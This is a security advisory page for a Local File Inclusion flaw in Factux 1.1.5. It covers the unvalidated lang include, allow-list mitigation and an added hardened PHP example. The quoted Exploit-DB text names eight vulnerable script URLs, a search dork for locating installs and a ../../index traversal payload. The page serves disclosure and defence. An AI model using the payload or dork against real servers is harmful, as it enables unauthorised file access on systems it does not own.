Vendor: Factux
By: altbta
CVSS: 7.5 (HIGH)
Vulnerability Type: Local File Inclusion (LFI)
CWE: 98
Product Name: Factux
Affected Version From: 1.1.5
Affected Version To: 1.1.5
Patch Exists: NO
Related CWE: N/A
CPE: a:factux:factux
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Published: 2009

Factux LFI Vulnerability

Factux 1.1.5 is vulnerable to Local File Inclusion (LFI). Several scripts read the lang query parameter and pass it unvalidated into a PHP include, include_once("include/language/$lang.php"), so an attacker who sends a crafted HTTP request with directory traversal sequences in lang can make the server include a file of their choosing. The original advisory lists the following scripts as affected: admin_modif.php, admin (given without the .php extension in the advisory), article_new.php, article_update.php, backup.php, backup_timeout.php, bon_suite.php and ca_annee.php. The example request from the advisory is http://[site]/factux/ca_annee.php?lang=../../index, which makes ca_annee.php include include/language/../../index.php, that is, the application's own index.php. Note the caveat a tester should keep in mind: because the application appends .php to the supplied value, only files ending in .php can be included unless the suffix can be cut off (PHP releases before 5.3.4 truncated include paths at a null byte); the advisory gives no such step, and no vendor patch is listed for 1.1.5.

Mitigation:

Never build an include path from raw request input. Validate the lang parameter against an allow-list of the language codes the application actually ships (or map codes to file names in a fixed array) and reject anything else. As defence in depth, canonicalise the final path with realpath() and confirm that it lies inside include/language/ before passing it to include_once, so that traversal sequences such as ../ can never escape the language directory.
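The following is an added example, not Factux's code and not part of the original advisory. It shows the vulnerable include pattern quoted in the advisory (with what the advisory's ../../index payload resolves to) next to a hardened replacement that allow-lists the language code and checks that the resolved path stays inside the language directory. The language list ['fr', 'en'], the helper name resolve_language_file and the directory layout are assumptions made for illustration; adjust them to the real installation.

```php
<?php
// Added example, not Factux's code. Vulnerable include as quoted in the
// advisory, followed by a hardened replacement.

// --- Vulnerable pattern (as quoted in the advisory) ---
// $lang comes straight from the query string, so the request
//   ?lang=../../index
// turns into include_once("include/language/../../index.php"), i.e. the
// application's own index.php, and any other .php file reachable by traversal.
//
// function vulnerable_include(string $lang): void {
//     include_once("include/language/$lang.php");
// }

// --- Hardened replacement ---
// Assumption: the installation ships French and English language files; the
// real set is not given on the page, so adjust this allow-list accordingly.
const ALLOWED_LANGS = ['fr', 'en'];

/**
 * Return the absolute path of the language file for $lang, or null when
 * $lang is not an allowed code or the resolved path escapes $langDir.
 */
function resolve_language_file(string $lang, string $langDir): ?string
{
    // 1. Allow-list: only known codes, compared strictly (no type juggling).
    if (!in_array($lang, ALLOWED_LANGS, true)) {
        return null;
    }

    // 2. Defence in depth: canonicalise and confirm containment, so a later
    //    change to the allow-list cannot silently reintroduce traversal.
    $base = realpath($langDir);
    $path = realpath($langDir . DIRECTORY_SEPARATOR . $lang . '.php');
    if ($base === false || $path === false) {
        return null; // directory or language file does not exist
    }
    if (strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null; // resolved outside the language directory
    }
    return $path;
}

// Reject non-string input (e.g. ?lang[]=x) instead of letting it reach the
// typed function and raise a TypeError.
$lang = (isset($_GET['lang']) && is_string($_GET['lang'])) ? $_GET['lang'] : 'fr';

$file = resolve_language_file($lang, __DIR__ . '/include/language');
if ($file === null) {
    http_response_code(400);
    exit('invalid language');
}
include_once $file;
```

With this in place, the advisory's payload ../../index fails the allow-list check and is rejected with HTTP 400 before any include runs; even if an allowed code were somehow mapped to a file outside include/language/, the realpath() containment check would still refuse it.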
Source

Exploit-DB raw data:

[~]######################################### InformatioN #############################################[~]
[~] Title : Factux LFI Vulnerability
[~] Author: altbta [l_9[at]hotmail.com]
[~] download : http://www.toocharger.com/telecharger/scripts/factux/3468.htm

[~]######################################### ExploiT #############################################[~]
[~] dork: "Factux le facturier libre V 1.1.5"

### include_once("include/language/$lang.php");

[~] Vulnerable File :

http://127.0.0.1/Factux/admin_modif.php?lang=
http://127.0.0.1/Factux/admin?lang=
http://127.0.0.1/Factux/article_new.php?lang=
http://127.0.0.1/Factux/article_update.php?lang=
http://127.0.0.1/Factux/backup.php?lang=
http://127.0.0.1/Factux/backup_timeout.php?lang=
http://127.0.0.1/Factux/bon_suite.php?lang=
http://127.0.0.1/Factux/ca_annee.php?lang=


[~] Example :

http://[site]/factux/ca_annee.php?lang=../../index


[~]#########################################~~{  altbta  }~~######################################[~]

rxh & sad hacker & ab0-3th4b